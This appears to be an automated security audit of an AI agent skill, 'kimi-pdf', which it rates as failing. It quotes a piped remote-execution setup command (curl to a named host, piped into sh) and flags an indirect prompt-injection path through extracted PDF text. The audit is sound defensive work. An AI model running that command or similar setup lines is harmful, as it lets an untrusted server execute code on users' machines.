kimi-pdf
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): Automated scans identified a piped remote execution pattern 'curl -fsSL https://drop-sh.fullyjustified.net | sh' associated with the skill's setup process. This allows an untrusted remote server to execute arbitrary commands on the host system.
- EXTERNAL_DOWNLOADS (HIGH): The 'pdf.sh' script installs packages globally via 'npm install -g' and 'npx playwright install'. This bypasses environment isolation and executes third-party code from remote registries at runtime without version pinning.
- PROMPT_INJECTION (LOW): The skill extracts text and tables from user-provided PDFs in 'cmd_extract.py' and 'cmd_form.py' without sanitization or boundary markers, creating an Indirect Prompt Injection surface. 1. Ingestion points: 'pdf_path' and 'pages' arguments. 2. Boundary markers: None. 3. Capability inventory: File system read/write, subprocess execution (LibreOffice), and package management access. 4. Sanitization: No sanitization or validation of the extracted PDF text is performed before it reaches the model context.
- COMMAND_EXECUTION (MEDIUM): The 'cmd_convert.py' script uses 'subprocess.run' to execute system commands for LibreOffice. While using list-based arguments, the function operates directly on user-provided file paths, which could be exploited for path traversal or other local attacks.
Recommendations
- HIGH: Downloads and executes remote code from: https://drop-sh.fullyjustified.net - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata